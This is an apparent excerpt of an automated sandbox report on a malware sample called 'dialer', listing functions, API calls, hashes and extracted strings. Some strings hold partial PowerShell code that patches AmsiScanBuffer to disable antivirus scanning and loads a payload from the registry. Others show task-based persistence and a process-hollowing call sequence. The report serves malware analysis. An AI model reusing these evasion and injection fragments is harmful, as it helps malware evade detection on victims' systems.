VariantInit 269->270 271 14000178e 269->271 270->271 271->267 273 140001174 272->273 274 140001167 GetProcAddress 272->274 273->212 273->213 274->273 296 140001000 CryptAcquireContextW 275->296 278 140001b2d 289 140001c0c lstrlenW 278->289 279 140001d0d StrStrIW 280 140001f21 6 API calls 279->280 284 140001d2c 279->284 280->278 281 140001d2f StrStrIW StrNCatW StrCatW 282 140001edf StrCatW StrStrIW 281->282 281->284 282->281 283 140001f19 282->283 283->280 284->281 284->282 285 140001ebf StrCatW 284->285 286 140001e82 StrCatW StrNCatW 284->286 288 140001e5a StrCatW StrCatW 284->288 285->284 287 140001eae StrCatW 286->287 287->285 288->287 299 140001070 289->299 291 140001c45 292 140001c49 StrStrIW 291->292 293 140001b3c 291->293 292->293 294 140001c5a 292->294 293->218 295 140001c5d StrStrIW 294->295 295->293 295->295 297 140001039 CryptGenRandom CryptReleaseContext 296->297 298 14000105e 296->298 297->298 298->278 298->279 300 140001000 3 API calls 299->300 301 1400010ea 300->301 301->291 301->301

                                                                  Callgraph

                                                                  Executed Functions

                                                                  Function 0000000140001C9C Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 196memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                                  • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                                  • API String ID: 3510167801-2888743547
                                                                  • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                                  • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300
                                                                  Function 0000000140001614 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 121memorycomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                  • String ID: dialersvc64
                                                                  • API String ID: 2407135876-3881820561
                                                                  • Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                                  • Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
                                                                  • Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                                  • Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340
                                                                  Function 0000000140001984 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                                  • SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                                  • LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                                  • LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                                  • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                                    • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
                                                                    • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
                                                                    • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
                                                                    • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
                                                                    • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
                                                                    • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
                                                                    • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
                                                                    • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
                                                                    • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
                                                                    • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
                                                                    • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
                                                                    • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
                                                                    • Part of subcall function 000000014000117C: CoInitializeEx.COMBASE ref: 0000000140001200
                                                                    • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
                                                                    • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
                                                                    • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
                                                                    • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
                                                                    • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
                                                                    • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
                                                                    • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
                                                                    • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
                                                                    • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
                                                                    • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
                                                                  • String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                                  • API String ID: 2204944113-1859800454
                                                                  • Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                                  • Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
                                                                  • Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                                  • Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600
                                                                  Function 0000000140001000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32encryptionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                  • API String ID: 1815803762-291530887
                                                                  • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                                  • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740
                                                                  Function 0000000140001A7C Relevance: 45.6, APIs: 8, Strings: 18, Instructions: 85memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AddressAllocHandleModuleProcProcess
                                                                  • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                  • API String ID: 3242894177-3709903795
                                                                  • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                                  • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394
                                                                  Function 000000014000117C Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 281memorycomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                  • String ID: SYSTEM$dialersvc64$powershell
                                                                  • API String ID: 3960698109-174983134
                                                                  • Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                                  • Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
                                                                  • Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                                  • Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700
                                                                  Function 00000001400017EC Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                  • String ID:
                                                                  • API String ID: 4184240511-0
                                                                  • Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                                  • Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
                                                                  • Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                                  • Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300
                                                                  Function 0000000140001C0C Relevance: 3.8, APIs: 3, Instructions: 40stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 168 140001c0c-140001c47 lstrlenW call 140001070 171 140001c49-140001c58 StrStrIW 168->171 172 140001c7c-140001c99 168->172 171->172 173 140001c5a 171->173 174 140001c5d-140001c7a StrStrIW 173->174 174->172 174->174
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID:
                                                                  • API String ID: 1659193697-0
                                                                  • Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                                  • Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
                                                                  • Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                                  • Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740
                                                                  Function 0000000140001970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 175 140001970-14000197b call 140001984 ExitProcess
                                                                  APIs
                                                                    • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                                    • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                                    • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                                    • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                                    • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                                    • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                                  • ExitProcess.KERNEL32 ref: 000000014000197B
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                                  • String ID:
                                                                  • API String ID: 3836967525-0
                                                                  • Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                                  • Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
                                                                  • Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                                  • Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

                                                                  Non-executed Functions

                                                                  Function 000000014000114C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 187 14000114c-140001165 GetModuleHandleA 188 140001174-140001178 187->188 189 140001167-14000116e GetProcAddress 187->189 189->188
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlGetVersion$ntdll.dll
                                                                  • API String ID: 1646373207-1489217083
                                                                  • Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                                  • Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
                                                                  • Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                                  • Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700

                                                                  Execution Graph

                                                                  Execution Coverage:6.3%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:38.1%
                                                                  Total number of Nodes:126
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 11316 7ffd9b8ae7a8 11317 7ffd9b8ae7b1 K32GetModuleInformation 11316->11317 11319 7ffd9b8ae872 11317->11319 11320 7ffd9b8aed66 11321 7ffd9b8aed75 MapViewOfFile 11320->11321 11323 7ffd9b8aee53 11321->11323 11324 7ffd9b8ae8ac 11325 7ffd9b8ae8b5 CreateFileA 11324->11325 11327 7ffd9b8aea4c 11325->11327 11328 7ffd9b8afde9 11329 7ffd9b8af6ba 11328->11329 11352 7ffd9b8afc3f 11328->11352 11359 7ffd9b8ae078 11329->11359 11331 7ffd9b8af73a 11331->11352 11363 7ffd9b8ae088 11331->11363 11333 7ffd9b8af77b 11334 7ffd9b8ae088 NtUnmapViewOfSection 11333->11334 11333->11352 11335 7ffd9b8af7ca 11334->11335 11335->11352 11367 7ffd9b8ae098 11335->11367 11337 7ffd9b8af804 11337->11352 11371 7ffd9b8ae0a8 11337->11371 11341 7ffd9b8af926 11381 7ffd9b8ae0c8 11341->11381 11343 7ffd9b8af951 11343->11352 11387 7ffd9b8ae0d8 11343->11387 11345 7ffd9b8af974 11345->11352 11393 7ffd9b8ae0e8 11345->11393 11347 7ffd9b8afb95 11399 7ffd9b8ae0f8 11347->11399 11349 7ffd9b8afbb7 11350 7ffd9b8ae0d8 4 API calls 11349->11350 11349->11352 11351 7ffd9b8afbfc 11350->11351 11351->11352 11405 7ffd9b8ae108 11351->11405 11354 7ffd9b8afc2b 11354->11352 11411 7ffd9b8ae118 11354->11411 11356 7ffd9b8af99b 11356->11347 11356->11352 11357 7ffd9b8ae0d8 4 API calls 11356->11357 11358 7ffd9b8ae0e8 4 API calls 11356->11358 11357->11356 11358->11356 11360 7ffd9b8ae081 NtUnmapViewOfSection 11359->11360 11362 7ffd9b8b0b0a 11360->11362 11362->11331 11364 7ffd9b8ae091 NtUnmapViewOfSection 11363->11364 11366 7ffd9b8b0b0a 11364->11366 11366->11333 11368 7ffd9b8ae0a1 NtUnmapViewOfSection 11367->11368 11370 7ffd9b8b0b0a 11368->11370 11370->11337 11372 7ffd9b8ae0af NtUnmapViewOfSection 11371->11372 11374 7ffd9b8af8f4 11372->11374 11374->11352 11375 7ffd9b8ae0b8 11374->11375 11376 7ffd9b8ae0c1 11375->11376 11380 7ffd9b8ae1aa 11376->11380 11417 7ffd9b8add58 11376->11417 11379 7ffd9b8add58 4 API calls 11379->11380 11380->11341 11382 7ffd9b8ae0d1 11381->11382 11383 7ffd9b8add58 4 API calls 11382->11383 11386 7ffd9b8ae1aa 11382->11386 11384 7ffd9b8ae18c 11383->11384 11385 7ffd9b8add58 4 API calls 11384->11385 11385->11386 11386->11343 11388 7ffd9b8ae0e1 11387->11388 11389 7ffd9b8add58 4 API calls 11388->11389 11392 7ffd9b8ae1aa 11388->11392 11390 7ffd9b8ae18c 11389->11390 11391 7ffd9b8add58 4 API calls 11390->11391 11391->11392 11392->11345 11394 7ffd9b8ae0f1 11393->11394 11395 7ffd9b8add58 4 API calls 11394->11395 11398 7ffd9b8ae1aa 11394->11398 11396 7ffd9b8ae18c 11395->11396 11397 7ffd9b8add58 4 API calls 11396->11397 11397->11398 11398->11356 11400 7ffd9b8ae101 11399->11400 11401 7ffd9b8add58 4 API calls 11400->11401 11404 7ffd9b8ae1aa 11400->11404 11402 7ffd9b8ae18c 11401->11402 11403 7ffd9b8add58 4 API calls 11402->11403 11403->11404 11404->11349 11406 7ffd9b8ae111 11405->11406 11407 7ffd9b8add58 4 API calls 11406->11407 11410 7ffd9b8ae1aa 11406->11410 11408 7ffd9b8ae18c 11407->11408 11409 7ffd9b8add58 4 API calls 11408->11409 11409->11410 11410->11354 11412 7ffd9b8ae121 11411->11412 11413 7ffd9b8add58 4 API calls 11412->11413 11416 7ffd9b8ae1aa 11412->11416 11414 7ffd9b8ae18c 11413->11414 11415 7ffd9b8add58 4 API calls 11414->11415 11415->11416 11416->11352 11426 7ffd9b8ae350 11417->11426 11418 7ffd9b8ae18c 11418->11379 11419 7ffd9b8ae582 11447 7ffd9b8adfb8 11419->11447 11421 7ffd9b8ae58a 11421->11418 11422 7ffd9b8ae57a 11423 7ffd9b8adfa8 NtUnmapViewOfSection 11422->11423 11423->11419 11424 7ffd9b8ae512 11442 7ffd9b8adfa8 11424->11442 11426->11418 11426->11419 11426->11422 11426->11424 11432 7ffd9b8adf88 11426->11432 11428 7ffd9b8ae54e 11437 7ffd9b8adf98 11428->11437 11430 7ffd9b8ae55f 11430->11424 11431 7ffd9b8adf88 NtUnmapViewOfSection 11430->11431 11431->11424 11434 7ffd9b8adf91 11432->11434 11433 7ffd9b8ae04b 11433->11428 11434->11433 11435 7ffd9b8b0ad0 NtUnmapViewOfSection 11434->11435 11436 7ffd9b8b0b0a 11435->11436 11436->11428 11438 7ffd9b8adfa1 11437->11438 11439 7ffd9b8ae04b 11438->11439 11440 7ffd9b8b0ad0 NtUnmapViewOfSection 11438->11440 11439->11430 11441 7ffd9b8b0b0a 11440->11441 11441->11430 11443 7ffd9b8adfb1 11442->11443 11444 7ffd9b8ae04b 11443->11444 11445 7ffd9b8b0ad0 NtUnmapViewOfSection 11443->11445 11444->11422 11446 7ffd9b8b0b0a 11445->11446 11446->11422 11449 7ffd9b8adfc1 11447->11449 11448 7ffd9b8ae04b 11448->11421 11449->11448 11450 7ffd9b8b0ad0 NtUnmapViewOfSection 11449->11450 11451 7ffd9b8b0b0a 11450->11451 11451->11421 11312 7ffd9b8aeafa 11313 7ffd9b8aeb09 CreateFileMappingW 11312->11313 11315 7ffd9b8aecb9 11313->11315 11452 7ffd9b8b0f20 11453 7ffd9b8b0f2f NtSetContextThread 11452->11453 11455 7ffd9b8b0fba 11453->11455 11456 7ffd9b8b0c5d 11457 7ffd9b8b0c6b NtWriteVirtualMemory 11456->11457 11459 7ffd9b8b0d37 11457->11459 11460 7ffd9b8b0fe4 11461 7ffd9b8b0fed NtResumeThread 11460->11461 11463 7ffd9b8b10a4 11461->11463 11464 7ffd9b8b0221 11465 7ffd9b8b022f CreateProcessA 11464->11465 11467 7ffd9b8b0950 11465->11467

                                                                  Executed Functions

                                                                  Function 00007FFD9B8AF63E Relevance: 3.2, Strings: 2, Instructions: 731COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
